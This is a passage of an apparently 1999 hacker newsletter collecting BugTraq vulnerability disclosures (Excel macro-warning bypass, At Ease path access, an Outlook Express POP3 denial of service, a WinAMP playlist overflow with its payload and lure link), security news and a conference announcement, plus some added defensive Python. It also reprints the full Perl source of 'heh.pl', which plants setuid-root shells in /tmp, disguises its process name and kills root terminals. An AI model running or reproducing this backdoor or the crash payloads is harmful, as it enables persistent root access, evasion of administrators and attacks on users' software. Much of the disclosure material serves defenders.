On 3/29/99 I posted a message to BugTraq titled, "Bypassing Excel
Macro Virus Protection". The message explained two ways to bypass the
"Macro Virus Protection" option in Excel 97. One is to password
protect an infected spreadsheet (Q176640) and the second is to copy an
infected spreadsheet into the XLSTART directory (Q180614). Both
methods will open an infected spreadsheet without the macro warning
appearing.
I would love to think Microsoft Security Bulletin (MS99-014) was in
response to my email but I'll be humble and chalk it up to
coincidence. I downloaded the patch to see if it addressed the two
scenarios I described above. I found that you will now receive the
macro warning on a password protected file but not on a file copied to
the XLSTART directory. Also, you can still enable or disable the
macro virus protection with a simple reg hack. I guess that is not so
important because if you can perform a reg hack, you can do a lot more
than execute an Excel macro.
I am not sure what really prompted Microsoft to release a patch for
Excel but I find it surprising that they did not address the XLSTART
option either. They should at least give us the option of deciding if
this directory is trusted, thereby by-passing the macro virus warning.
'nuff said.
rotaiv -£-
-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.0.2
iQEVAwUBNzsxdQuGSvRTfa2rAQHe+Af+NXzCRMZ6ALIsiezLQ5XhOuBgmRZALeoO
k2LMkGfVea8jO7olA/wtwnrS2E0eCUVSMW23ZSxkd8Q9hbYBxbc8GvPOzOTGL4EP
tmZkyvxcB2QyyDmJjIQuJQKcGCggr0ahPNr9pvv9DsBHJeRifcS6niXZrm5uQJb7
qhY4QJzAWQ9cXEiqoNuTofgR1eg276MUSuh2Om29FIjkfcMocdGghrkQLBGvN9MB
Hlm9Z7D0I3/zT88c+A6IeyZHbe9/6PaAODgn3QuhKla8PbetyGj/Qbclua5kNR/X
tVoLWIIrcA2ZKsgQn1SLtcKTqDV5KPTGrz3yB1ZH9BJ37qmXLOegfw==
=qJ15
-----END PGP SIGNATURE-----
@HWA
22.0 Possible root compromise when installing new SSHD
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Mon, 10 May 1999 22:26:19 +0200
From: "GWDVMS::MOELLER" <moeller@gwdvms.dnet.gwdg.de>
Subject: Risks of upgrading a UNIX system
When was the last time you rebuilt all privileged (`suid root') applications
when upgrading a unix system, just in case?
I'm pretty sure one can find `small print' that demands this, however I'm
equally sure that hardly any system manager does so, since problems seem to
occur _very_ rarely. Here's a neat one:
Some time prior to the upgrade, system manager (S.M.) was asked to install
`sshd' on a not-so-common platform (nothing really security-relevant,
machine used for raw speed only, users just being accustomed to that sort of
login). Said platform (featuring a particularly elaborate user data base)
requires some special calls (simple calling sequences) to be done during
`login' - no problem, `sshd' knows about them, although not explicitly aware
of the particular hardware. Cautiously, S.M. configures `sshd' to not allow
`root' logins from the outside. What other harm could it possibly do?
Upgrade has to occur somewhat in a hurry, release documentation isn't
on-site, but procedures are known well enough. S.M. asks the manufacturer's
support representative if special precautions have to be taken, "errr, not
that I'd think so". S.M. installs new version, all fine & dandy, even
remembers to check out `sshd' afterwards and finds it to work the same as
before.
A couple of days later, S.M. logs in via `sshd' himself, and for the first
time enters `su'. Gets very amazed at the new system's intelligence, as it
knows to not ask him for a password. Minutes later, S.M. recognizes that
`su' would never ask for a password, when the parent process had been
created via `sshd' ... in spite of no other visible peculiarities with that
process.
A re-build (pretty likely boiling down to nothing but a re-link) of `sshd'
fixed the problem.
Quite a few years ago, when I saw the first mention of `ssh', I commented
"If you're a bank, you don't buy your safe at a flea market;
if you're not, you might be better off without a safe".
Maybe there's _some_ truth in it, after all.
Dr. Wolfgang J. "s."Moeller, Tel. +49 551 2011510, GWDG, D-37077 Goettingen,
F.R.Germany <moeller@gwdvms.dnet.gwdg.de> <moeller@decus.decus.de>
P.S. re "software bloat":
Imagine uSoft going open source, and no-one going to have a look at it...
[from Risks Digest 20.39]
@HWA
23.0 Apple's AtEase 5.0 security hole
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Thu, 13 May 1999 09:37:57 -0600
From: Tim Conrad <tconrad@KENWOOD.EDISONPROJECT.COM>
To: BUGTRAQ@netspace.org
Subject: At Ease 5.0 Security Hole
<it helps when you finish your message before hitting the 'send' button>
Hello;
At Ease 5.0 will allow a user to access any user's volume on the server.
The tested configuration is as follows:
MacOS 7.6.1 (should work with anything greater than 7)
At Ease 5.0.2
AppleShare IP 5.0.3
Netscape 4.0.7 (No reason it shouldn't work from .99 to 4.5)
How to do it.
Log in as any user that has access to Netscape Communicator, and type in
file://Macintosh%20HD/System%20Folder/ and you are able to access the disk.
Do the same thing, except use
file://At%20Ease%20Volume%20Name/At%20Ease%20%Docs/username and it's quite easy
to browse through anyone's files.
It is possible to download files from that users directory. I have been unable
to actually open any of the files once they are downloaded, however in an
educational setting, just viewing names in a certain directory could constitute
some serious problems (such as if a teacher works with Special Education
students, and has a list of documents to their parents).
Apple apparently will not fix their own product. There is a 3rd party extension
available for this at: http://www.ncal.verio.com/~lsr/programs/MSIENoServers.hqx
Tim Conrad
---------------------------------------------------------------------------------
Date: Fri, 14 May 1999 18:48:37 -0700
From: Vincent Janelle <malokai@GILDEA.NET>
To: BUGTRAQ@netspace.org
Subject: Re: At Ease 5.0 Security Hole
This is not an Apple problem mostly, it's an MSIE problem.
Hell, is At Ease still supported? It's just a replacement Finder as far as
I know, it doesn't do things like replace fs drivers and patch binaries to
stop things like that.
------------
If you have any trouble sounding condescending, find a Unix user to show
you how it's done. -Scott Adams
--http://random.gimp.org --mailto:random@gimp.org --UIN 23939474
On Thu, 13 May 1999, Tim Conrad wrote:
> Apple apparently will not fix their own product. There is a 3rd party extension
> available for this at: http://www.ncal.verio.com/~lsr/programs/MSIENoServers.hqx
>
> Tim Conrad
@HWA
24.0 Bug in Microsoft Outlook Express
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Outlook Express Win98 bug
Miquel van Smoorenburg (miquels@CISTRON.NL)
Tue, 11 May 1999 10:58:41 +0200
There is a bug in Outlook Express delivered with Windows '98, at least
version 4.72.3110.1 (4.01 SP1) and 4.72.3120.0 (4.01 SP1 + oepatsp1)
Windows '95 updated with MSIE 4.01 has Outlook Express 4.72.3612.1700,
which doesn't show the problem. OE from MSIE3 and MSIE5 don't have the
problem either. There might be versions of MSIE4 included with Windows
'98 that don't show the problem either, but I don't have a stack of
Windows CDs to test against.
We have talked to Microsoft NL about this, tracking number S2134 T6142.
However they either deny there is a bug ("sorry sir, this product has
been available for a year now so there cannot be any bugs in it") or
they do not understand what we are talking about. They also claim to
have not received any mail we sent to them, so I am giving up on that.
We did send them this bug report by fax, perhaps that technology is
stable enough to work for them, I don't know.
Description of the problem:
A dot on a single line means EOM in the POP3 protocol. If a message
contains that it must be escaped by adding an extra dot, so we have 2
dots on a single line - which is OK. However if on the TCP level the
line after this double-dot crosses over to the next packet, Outlook
Express will interpret the double-dot as a single dot, switching back to
POP3 command mode and interpreting the rest of the message as a response
from the POP3 server. Result is an error message and usually a hanging
POP3 session.
Perhaps it's not really a bug in Outlook, but the Windows I/O library
or the TCP implementation.. which is scary.
So at the TCP packet level it looks like this:
packet1: [message data]
packet1: \r\n..\r\nthis is a line that
packet2: continues in the next packet
The double-dot on the 2nd line will be interpreted as a single dot.
Include a few thousand lines like this in an email and the bug will trigger:
So
.
this
.
might
.
actually
.
cause
.
the
.
bug
.
with
.
some
.
luck
.
repeat
.
until
.
three
.
times
.
max
.
mtu
.
of
.
1500
Mike.
--
Indifference will certainly be the downfall of mankind, but who cares?
------------------------------------------------------------------------------
Outlook Express Win98 bug, addition.
Miquel van Smoorenburg (miquels@CISTRON.NL)
Wed, 12 May 1999 10:59:46 +0200
In article <cistron.7h8rg1$eos$1@Q.cistron.nl>,
Miquel van Smoorenburg <miquels@CISTRON.NL> wrote:
>There is a bug in Outlook Express delivered with Windows '98, at least
>version 4.72.3110.1 (4.01 SP1) and 4.72.3120.0 (4.01 SP1 + oepatsp1)
[...]
>Outlook
>Express will interpret the double-dot as a single dot, switching back to
>POP3 command mode and interpreting the rest of the message as a response
>from the POP3 server. Result is an error message and usually a hanging
>POP3 session.
It occurred to me that it might not be clear from the original message,
but because the POP3 session is hanging, the message will not be removed
from the server and the next time mail is checked the same thing will
occur. This is an effective DoS attack against the mailbox.
The only way to solve this is to remove the message with another
POP3 email program (Eudora, Pegasus) or to ask the sysadmin of the POP3
server to remove the message manually (look for a message that has a line
starting with a dot).
Upgrading to MSIE 5.0 will also solve the problem, but there is no
simple/small bugfix from Microsoft available (an MSIE 5.0 download is
what - 20 MB at least?) yet for as far as I know.
So, ISP helpdesks - take note. This is at least one of the causes of
the problems all these people have been having with their "blocked mail".
Mike.
--
Indifference will certainly be the downfall of mankind, but who cares?
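The failure described in both messages above is a client deciding between a stuffed ".." and the lone "." terminator on a fragment that straddles two TCP segments. The following is an added example, not code from the original post: the RFC 1939 server-side stuffing, an incremental client-side reader that only ever decodes complete lines, and a check that feeds the same message split at every byte offset to confirm the decoded body never changes. The sample body is constructed here in the shape of the post's trigger (lines consisting of a single dot).

```python
"""POP3 RETR body decoding that is robust to TCP segmentation.
Added example: RFC 1939 byte-stuffing on the server side, an incremental
client-side reader, and a boundary check over every possible split point."""

CRLF = b"\r\n"


def dot_stuff(lines):
    """Server side: a body line beginning with '.' gets one extra '.'
    prepended; the body ends with a lone '.' on its own line."""
    out = bytearray()
    for line in lines:
        if line.startswith(b"."):
            out += b"."
        out += line + CRLF
    out += b"." + CRLF
    return bytes(out)


class Pop3BodyReader:
    """Client side. Accepts bytes in whatever chunks the socket delivers and
    decodes only complete (CRLF-terminated) lines, so the '..' vs '.'
    decision is never made on a fragment that straddles two segments."""

    def __init__(self):
        self._buf = b""
        self.lines = []        # decoded body lines, CRLF removed
        self.finished = False  # set once the terminating lone '.' is seen

    def feed(self, chunk: bytes):
        if self.finished:
            if chunk:
                raise ValueError("bytes received after end-of-message")
            return
        self._buf += chunk
        while not self.finished:
            end = self._buf.find(CRLF)
            if end < 0:
                return  # partial line: wait for the rest of it
            line, self._buf = self._buf[:end], self._buf[end + 2:]
            if line == b".":
                self.finished = True
            elif line.startswith(b"."):
                self.lines.append(line[1:])  # un-stuff: drop one leading dot
            else:
                self.lines.append(line)
        if self._buf:
            raise ValueError("data after end-of-message terminator")


def decode_chunks(chunks):
    """Decode a body delivered as a sequence of arbitrary byte chunks."""
    reader = Pop3BodyReader()
    for chunk in chunks:
        reader.feed(chunk)
    return reader.lines, reader.finished


def decodes_identically_for_all_splits(lines):
    """Re-deliver the stuffed message as two segments, moving the split over
    every byte offset; the decoded body must equal the original and the
    terminator must be recognised at every offset."""
    wire = dot_stuff(lines)
    expected = list(lines)
    for cut in range(len(wire) + 1):
        got, done = decode_chunks([wire[:cut], wire[cut:]])
        if not done or got != expected:
            return False
    return True


# Constructed sample in the shape of the post's trigger: body lines that
# consist of a single dot, interleaved with words, plus two other dot cases.
SAMPLE_BODY = [b"So", b".", b"this", b".", b"might", b"...", b".hidden", b"1500"]

if __name__ == "__main__":
    wire = dot_stuff(SAMPLE_BODY)
    # Split exactly where the post says OE goes wrong: right after "..\r\n",
    # part way through the following line.
    cut = wire.index(b"\r\n..\r\n") + len(b"\r\n..\r\n") + 2
    print(decode_chunks([wire[:cut], wire[cut:]]))
    print(decodes_identically_for_all_splits(SAMPLE_BODY))
```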
@HWA
25.0 Trivial buffer overflow DoS on WinAMP 2.x
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Date: Wed, 12 May 1999 13:02:43 +0200
From: Wojtek Kaniewski <wojtekka@BYDNET.COM.PL>
To: BUGTRAQ@netspace.org
Subject: Buffer overflow in WinAMP 2.x
Introduction
------------
WinAMP is a popular Windows sound player with support for many file
formats (MP3, wave files, modules). It also supports MP3 streaming
(let's call it sh0utcast).
Description of the problem
--------------------------
If we tell WinAMP to open a file location (Ctrl+L) which is over 256
bytes long, it'll produce a nice GPF. The bug also appears when loading
playlists (.m3u and .pls).
What can we do with this bug?
-----------------------------
Many sh0utcast radios place .pls files on their websites, which contain
URL for radio's sh0utcast server.
If we'll make b00m.pls file like this...
[playlist]
NumberOfEntries=1
File1=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA... (about 256 A's)
and put such link...
<A HREF="b00m.pls">Techno explosion -- The Coolest MP3 Radio</A>
on our website, we can make a couple of WinAMPs crash. I suppose that
there's a possibility to put our own code in the filename (see cDc-351
for details).
Nullsoft (producer of WinAMP) has been notified about the bug two
versions ago.
--
wojtekka@irc.pl :: http://wojtekka.stone.pl/ :: ^wojtekka@ircnet
-----------------------------------------------------------------------
Date: Fri, 14 May 1999 15:56:28 -0400
From: William Yodlowsky <wyodlows@route1.nj.devry.edu>
To: BUGTRAQ@netspace.org
Subject: Re: Buffer overflow in WinAMP 2.x
Tested on WinAMP v2.091 on Win95A and Win95B;
v2.21 on Win98;
v1.9? and v2.21 on WinNT 4.0WS
It produced GPFs on all except WinNT, where it opened but simply didn't
play.
--Bill
<wyodlowsky@route1.nj.devry.edu>
On Wed, 12 May 1999, Wojtek Kaniewski wrote:
-----------------------------------------------------------------------
Date: Mon, 17 May 1999 03:40:48 +0100
From: Jello Biafra <biafra@X-STREAM.CO.UK>
To: BUGTRAQ@netspace.org
Subject: Re: Buffer overflow in WinAMP 2.x
On NT Server 4 with no Service Packs installed, this causes an
application error. Platform is a Cyrix MMX 233.
Access Violation (0xc0000005), Address : 0x62626262
@HWA
26.0 DISA limits network activity
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
DISA Limits Network Activity
contributed by erewhon
On April 18, the Defense Information Systems Agency (DISA) canceled all limited peacetime privileges including
internet and email usage in an effort to bolster the amount of communications bandwidth. This will prevent
all unofficial Internet traffic on the European Command's Common User Data Network (CUDN). The Army's 5th
Signal Command has been tasked with monitoring the network for violations of this policy. One civilian
employee has reportedly already been fired for surfing for up to 13 hours on two separate occasions. This
order is also designed to limit "push" technologies and large email attachments.
Federal Computer Week
http://www.fcw.com/pubs/fcw/1999/0517/web-lock-5-17-99.html
MAY 17, 1999 . . . 17:55 EDT
U.S. European Command locks down Internet Access
BY DANIEL VERTON (dan_verton@fcw.com)
HEIDELBERG, Germany -- To bolster the amount of communications
bandwidth, the U.S. Army and Air Force have significantly curtailed the
personal use of the Internet by servicemen under the European Command,
including those deployed in the Balkans.
The Defense Information Systems Agency's European field office began an
effort to increase by 30 percent the available communications services of the
Defense Information Systems Network throughout the European theater to
support NATO's humanitarian and combat missions in Yugoslavia. Hoping to
free up needed bandwidth, the Army and Air Force on April 18 issued the
policy, which canceled all limited peacetime privileges granted to government
and military employees to use government computer systems, particularly e-mail
and the Internet, for personal use. The policy will remain in effect for up to one
year from the date it was issued.
"Our ability to support and sustain classified and unclassified e-mail capability
for current operations...is affected by the available bandwidth on the" European
Command's Common User Data Network (CUDN), according to the
memorandum. "For that reason, it is imperative that [U.S. Army Europe]
establish a minimize order immediately to all secure and non-secure network
subscribers. Effective immediately, no unofficial Internet traffic may occur on
the CUDN until [the] minimize [order] is lifted."
The memo specifically directs the Army's 5th Signal Command to actively
monitor the network for violations of the policy. It also calls on local unit
commanders to brief all their personnel and to "routinely check on user activity"
for evidence of inappropriate use of government computers. One civilian
government employee has been dismissed based on evidence that he had visited
inappropriate Web sites on two separate occasions, totaling up to 13 hours of
Web surfing. The military services also have curtailed the use of "push"
technologies for continuous news feeds and the attachment of large files to
e-mails.
The policy allows, however, some leeway for appropriate use of the Internet in
support of morale, welfare and recreational activities, such as providing soldiers
and airmen deployed in Albania, Macedonia and elsewhere with links to family
members in the United States.
In addition to slowing down the network, "personal use of Internet services
provides a conduit through which information assurance and security can be
compromised," according to a spokesman for the Army's European Command.
"Our information dominance depends on it, and we are running out of pipes."
@HWA
27.0 Money in the bank is an intangible?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From http://www.net-security.org/
HACKER'S PARADISE
by BHZ, Monday 17th May 1999 on 10:08 pm CET
Looks like after Norway, hackers could find their paradise in New Zealand. The Law
Commission has acknowledged that it is not against the law for a hacker to break
into a New Zealand bank's computer system and transfer funds into his or her own
bank account. "There cannot be theft under section 220, Crimes Act 1961, of an
intangible thing. In (a recent Court of Appeal case) the court held that the definition in
section 217 is confined to tangible things and does not extend to ... a credit in a bank
account." Read the article on InfoWar.
http://www.infowar.com/hacker/99/hack_051799b_j.shtml
Hacker Sitings and News
5/17/99
New Zealand: Urgent Action Wanted To Protect Banks From Hacking.
THE Law Commission has acknowledged that it is not against the law for a hacker to break into a New Zealand bank's computer system and transfer
funds into his or her own bank account.
In a report on computer crime, the commission says that under section 220 of the Crimes Act 1961 it is not against the law to steal something intangible.
"There cannot be theft under section 220, Crimes Act 1961, of an intangible thing. In (a recent Court of Appeal case) the court held that the definition in
section 217 is confined to tangible things and does not extend to ... a credit in a bank account."
The Network of Internet Related Organisations is pushing for urgent changes to legislation to protect banks and other organisations from the effects of
hackers.
Spokesman Chris Patterson, a solicitor with Hesketh Henry, said it was an understatement to say electronic security in New Zealand was a huge problem.
Mr Patterson said Niro believed an amendment to the Crimes Act should be passed by the Government immediately to stop cyber-criminals.
The Law Commission has recommended that there be four new offences dealing specifically with computer misuse. They are: unauthorised interception of
data stored in a computer; unauthorised accessing of data stored in a computer; unauthorised use of data stored in a computer; and unauthorised damaging
of data stored in a computer.
Justice Minister Tony Ryall said he planned to introduce a draft bill including the first three offences by the end of next month. But he said the offence of
hacking raised more complex issues and would need further consultation before legislation on that was drafted.
THE DOMINION 14/05/1999
@HWA
28.0 r00tfest is coming soon, with some heavyweights planning to attend
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ Who; The computer underground, security professionals, IT managers, feds, system administrators, and anyone else
who would like to learn more about security.
+ What; A computer security conference that will have speakers, vendors, door prizes, contests, events and more.
+ When; May 21-23, 1999
+ Where; Smack in the middle of North America, in Minneapolis Minnesota at the Minneapolis Convention Center, room 103.
+ Why; To expand your computer security knowledge, visit the famous Mall of America, meet many of the people face to face that you've
been talking with over the internet, meet new friends and contacts, and get away from your job for a couple days.
+ Cost; - $40 at the door. More info at www.rootfest.org
RootFest '99 Speakers
Bruce Schneier - Topic To Be Announced.
Mr. Schneier is the president of Counterpane Systems, and the inventor of the Blowfish algorithm. He is the author of Applied Cryptography,
The Electronic Privacy Papers, and E-Mail Security. Mr. Schneier has given talks at DefCon, and the Black Hat Briefings.
Steve Stakton (Optiklenz) - Cisco PIX Firewall Security Analysis
Optiklenz is the founding member of the Legions of the Underground, and their newly formed Legions Interactive. He is a frequent editor and
contributor to the LoU ezine, Keen Veracity.
Adam L. Beberg - Software Development for a Hostile Internet
Adam L. Beberg is the founder and president of Distributed.net, founded in 1997 as a gathering point for research and projects related to
distributed computing. Adam is currently working on Cosm, a protocol for large scale distributed computing.
Mike Roadancer - "Hacker - It's not a Dirty Word" Hackers in the workplace.
Mike Roadancer is the president of the Hacker's Defense Foundation.
Brian Ristuccia - Circumventing Censorware, Filtering Proxies, and Government Firewalls.
Mr. Ristuccia is the author of the Internet Alternate Namespace proxy server software and operator of the Anti-Censorware Proxy. He is a
University of Massachusetts Computer Science Undergraduate and an employee of Nortel Networks.
Peter Shipley - The results of a 3 year effort multi-modem wardialing on a massive scale. Security problems occur when obvious security
problems are overlooked. One commonly overlooked problem is alternative access methods to a corporate Intranet from an external machine.
Many if not most companies are overlooking their secondary vulnerabilities surrounding alternate methods of network access. The results of
the completed survey will be analyzed and summarized along with lessons and techniques learned.
Mr. Shipley is a consultant in the San Francisco Bay Area with over thirteen years' experience in the Computer Security field. Currently
working for KPMG LLP. out of the San Jose/Silicon Valley office with the title of "Chief Security Architect". Mr. Shipley is one of the few
individuals who is well known and respected in the professional world as well as the underground/hacker community. He has extensive
experience in system and network security as well as programming and project design. Mr. Shipley's past accomplishments include first in
depth research into the security aspects of wardialing, designing and implementing the first automated network security scanner, among other
accomplishments. Mr. Shipley's specialties are third party penetration testing and firewall review, computer risk assessment, and security
training. Mr. Shipley also performs post-intrusion analysis as well as expert witness testimony.
Paul McNabb - Trusted Operating Systems Technology in Web-based Computing
Mr. McNabb is the CTO and vice president of Argus Systems Group, Inc. and has over ten years of in-depth experience in the design,
development, documentation and testing of secure operating systems and networks. He has also performed security consulting and seminars
for various military, government, university and industry groups in numerous countries.
Brenno J.S.A.A.F. de Winter - Internet Security in Europe: State of Affairs.
Brenno de Winter is the president of De Winter Information Solutions, based in the Netherlands. He has years of experience in development,
risk assessment and security. He is involved in the development and consultancy of web-based functions and security, and is currently the
project leader in end-to-end testing of digital television equipment for Philips (focused on conditional access).
DataShark - All about TEMPEST monitoring
DataShark is a U.S. hacker from the famed Legions of the Underground hacking group. He plans on having a working TEMPEST/van Eck
monitoring station in time for RootFest.
Richard Thieme - Cancelation: Date conflict. Look for Mr. Thieme at RootFest 2K.
Bill Campbell - Biometrics: Opportunity and Challenge
Bill Campbell is Principal Consultant with Eagle's Reach, an independent information security and technology risk management firm
headquartered in the Boston area. He was previously Director of Information Security Engineering with Fidelity Investments, and has over 15
years experience in technical security, software development, operations support, and quality assurance in both the private and public sectors.
(Eagle's Reach does not develop, market or sell biometric products.)
GloiDemon - Vector-based Super Hashing, Middle East State of Affairs
GloiDemon is a hacker from Kuwait
Winn Schwartau - Time-based Security (via video conference)
Winn Schwartau is the leading authority on Information Warfare. His sites, Infowar.com and Info-Sec.com are some of the most popular
security sites on the 'net. He has published many books, including Information Warfare: Chaos on the Electronic Superhighway, and his
new book, Time Based Security, the opening chapters of which can be found here. He has given talks at Black Hat, and DefCon.
John Kozubik - Intrusion Detection Systems
John Kozubik has over four years experience in the network security field, and is currently working on VPN's, wireline encryption, and
operational Intrusion Detection. He writes a monthly NT security column, available at NetworkCommand, and has written several white
papers on Intrusion Detection, Decoy Networks, and Disaster Recovery.
From http://www.403-security.net/
RootFest elite security conference
Astral 13.05.1999 18:45
RootFest is a computer security convention and conference being held in Minneapolis, Minnesota, USA. As far as
I know, it's the first of its kind in the whole Midwest. We welcome all computer security professionals, the
computer underground, hackers, IT professionals, government agents, feds, MIB, and anyone who would like to
come learn about computer security. Check their website RootFest.
http://www.rootfest.org
From http://www.net-security.org/
ROOTFEST IS CLOSE
by BHZ, Friday 14th May 1999 on 1:01 pm CET
Rootfest is coming. It is a security conference held in Minneapolis (USA), which will
be very "elite" this year. Many security professionals are coming to give a speech.
The Dutch Brenno de Winter, owner of De Winter Information Solutions, will speak on
the State of Affairs in Europe. He did some research and the results are disturbing.
Read his article called Robustness of data security is poor.
Just to inform our readers that HNS will have a detailed special report on Rootfest.
PRESS ANNOUNCEMENT
Robustness of data security is poor
General
From May 21st till May 23rd a computer security conference, called Rootfest, will be held in Minneapolis (USA). At this conference security specialists, the "hacking"
society, IT professionals, United States government agents and the FBI will come together to discuss computer security. The Dutch Brenno de Winter, owner of De Winter
Information Solutions, will speak on the State of Affairs in Europe. For this conference he did some basic research. The results are disturbing.
About Rootfest
Almost anywhere in the world people are becoming aware of the fact that computer crimes are a potential and present danger to our society. Last year Bill Clinton
spoke about terrorism moving more towards the computer. With this danger in mind a conference has been organised. At this conference hackers, FBI, police officials,
governments, computer specialists and IT security professionals join forces and will focus together on the same problem. Currently somewhere between 600 and 900
attendees are expected to come.
State of Affairs in the Netherlands
Every day more and more is written about e-commerce (electronic sales through the internet). In the Netherlands the internet is pushed by the government in the SWAP
2000 project. SWAP 2000 is an effort to reduce the gap between the Netherlands and the USA in technology. Computer crimes are a real threat to the growth of
technology.
The test
The main target was to use a medium that is widely spread and where basic security is simple and cheap. So e-mail was chosen. An artifact of e-mail is that quite
often viruses get spread through e-mail (in this context one can think of the very recent Melissa virus). Since the target was getting a general impression on secure
e-mail, 39 Dutch organisations have been mailed. These organisations were insurance companies, banks, 12 major ICT companies, 8 government organisations and 4 political
parties. Important was that the organisation needs to have reasons to receive confidential documents or the organisation delivers internet-related systems (ICT
companies -> they need to indicate the secure way). The e-mail first briefly indicated that sending data per e-mail could mean a risk and then asked what method could
be used to send a secure e-mail (encryption). Remark: e-mails are basically letters that are sent out without an envelope. By using encryption this envelope is provided
for the e-mail. E-mails can be easily intercepted and thus read. This can lead to confidential data becoming public. Also without encryption it is very easy to send mail
using somebody else's identity. By using encryption signatures can be checked.
Results
When a response came to the request, the answer was noted. When it was stated that e-mail was used for informal communication only, that was accepted as a proper
solution (because sensitive data was sent by other means). When no response was given, there is a major chance that people start sending the sensitive data without any
security measures. So this was regarded as no solution available. No bank or insurance company has a policy on secure e-mail. One insurance company mailed that
they couldn't (of course) inform me on this issue out of security considerations. Only two out of twelve ICT companies had a way of using secure e-mail. Most
government organisations only used e-mail as an informal way of communication and thus reduced the risk. One unfortunate thing is the police West-Veluwe Vallei in the
Netherlands that allows people to press charges by e-mail. They use e-mail formally and use unsecured forms and thereafter unsecured e-mail (although they wrote
they were considering their options).
Other facts
Also attention has been paid to the security of laptops. Laptops contain programs and data. This data ought to be encrypted, so if a laptop is stolen no data becomes
available. Last year a police team, LRT (national detective team), had a laptop that was stolen out of a police building. All data (snitches, cases under investigation)
became known. This data was handed to the press. Encryption to prevent this is easy and cheap to get. However less than 7% of the companies checked were
protecting their data.
Finally
The several small investigations show, according to Brenno de Winter, that the awareness of data security is way below an acceptable point. This may easily lead to major
incidents in the future, setting back usage of the internet and other ICT solutions. However basic security is often freely available.
About Brenno de Winter
Brenno de Winter, 27, is CEO of De Winter Information Solutions. De Winter Information Solutions is a company that focusses on software development, consultancy
and Internet solutions and security. Brenno has been programming since he was twelve years old and working on the internet since 1992. In the so-called Open Source
community he is active in several freeware projects, among them the freeware encryption program GnuPG.
Further information
If you would like further information you can contact Brenno de Winter. E-mail: brenno@dewinter.com phone: +31 6-53 53 6508 fax: +31 318-652913. On the internet:
http://www.dewinter.com
For secure e-mail you can find the PGP-public key on http://www.dewinter.com/secure.html
For further information on Rootfest you can go to http://www.rootfest.org
Some examples on how easy it is to attack security can be shown upon request.
@HWA
29.0 heh.pl creates a number of rootshells in /tmp and disguises itself..
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From PacketStorm Security http://www.genocide2600.com/~tattooman/new.shtml
Heh.pl - Heh.pl is a program that creates a user specified number of rootshells in /tmp, disguises itself, monitors the clone rootshells, and logs out all root
terminals and disables console when desired, giving you time to clean logs and make a quick exit. Simple, but neat. 3k. By feach, We're All Gonna Die cult.
#!/usr/bin/perl
# Heh.pl
# By: feach
#
# this program creates rootshells
# in /tmp you pick the amount of shells, it
# disguises itself, watches for the other clones, and
# kills root if any clones die.
#
# Shouts Out: me, sirgrim, www.WAGD.com, #hacking on webchat
#
#
&set_vars;
while ($famsize > 1) {
&forker;
$famsize--;
}
&initialize;
&controlfreak;
die "this shit wont werk were ur dumbass is at";
# THIS IS THE ONLY SECTION YOU NEED TO CHANGE
sub set_vars {
$famsize = 20; #how many additional clones do you want
$rootid = 0;
$shelltime = 15; # Tells you to leave the clones out for 15 seconds
$sleeptime = 45; #To sleep 45 seconds between clones
$paranoid = 0; # set this if you want to kill *all* shells, not just root
# look at that below get creative make this prog kick some ass
#@psnames = ('vi','nfsiod','kflushd','kswapd','update','lpd','/usr/sbin/rpc.mountd','/usr/sbin/rpc.nfsd','0wned');
@psnames = ('dickhead','shitface','fuck','diebitch','x0x','phucewe','mountme','shitd','0wned');
}
sub initialize {
&set_vars;
&disguise;
&scent;
sleep 2;
&fraternize;
}
sub disguise {
srand(time ^ $$);
$randum = int(rand(9));
$0 = $psnames[$randum];
}
sub controlfreak {
$end = 0;
$slept = 0;
$shell = 0;
while ($end < 1) {
&check_bro;
sleep 1;
++$slept;
if ($shell == 0 && $slept > $sleeptime) {
&make_shell;
$slept = 0;
$shell = 1;
}
if ($shell == 1 && $slept > $shelltime) {
&kill_shell;
$slept = 0;
$shell = 0;
}
}
}
sub panic {
&kill_roots;
&set_vars;
while ($famsize > 1) {
&forker;
$famsize--;
}
&initialize;
&kill_roots;
}
sub scent {
open PSLOG, '>>/tmp/31336.tmp';
print PSLOG "$$-";
close PSLOG;
}
sub fraternize {
open (PSLIST, '/tmp/31336.tmp') || die "no ps list!!!\n";
@brolist = split("-",<PSLIST>);
close PSLIST;
sleep (4);
if (-e '/tmp/31336.tmp') { unlink '/tmp/31336.tmp';}
}
sub check_bro {
$ok = 0;
foreach $ps (@brolist) {
unless (kill 0,$ps) { &panic;}
}
}
sub make_shell {
unless (-e '/tmp/.nfsd') {
system ('cp /bin/sh /tmp/.nfsd');
system ('chmod 4755 /tmp/.nfsd');
}
#system ('touch -t 031320251996 /tmp/.nfsd);
}
sub kill_shell {
if (-e '/tmp/.nfsd') {
unlink '/tmp/.nfsd'; #a better shell killer...
}
}
sub kill_roots {
open( PSK, "ps -jax |");
while ($xx = <PSK>)
{
chop ($xx);
@info = split(" ", $xx, 10);
if ($info[7] == $rootid && $info[9] =~ 'sh') {
unless ($info[9] =~ 'flush') {kill 9,$info[1];}
}
}
close(PSK);
}
sub forker {
$spawn_id = fork();
die "fork failed: $!" unless defined $spawn_id;
if ($spawn_id) {
waitpid($spawn_id,0);
}
else {
$dfork = fork();
die "double fork failed $!" unless defined $dfork;
if ($dfork) {
exit 0; }
$famsize = 0;
}
}
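The script above leaves a small set of host artefacts: a setuid-root copy of /bin/sh parked in /tmp as `.nfsd`, a transient pid list in `/tmp/31336.tmp`, and perl processes whose `$0` has been rewritten to a daemon-like name. The following is an added example, not part of the PacketStorm listing, that checks for exactly those traces; the pure helpers take their inputs as arguments so they can be exercised offline, while `scan_dirs` and `scan_proc` read the live system (Linux `/proc` layout assumed).

```python
"""Host checks for the artefacts a tool like heh.pl leaves behind.
Added example: (1) setuid-root regular files in world-writable directories,
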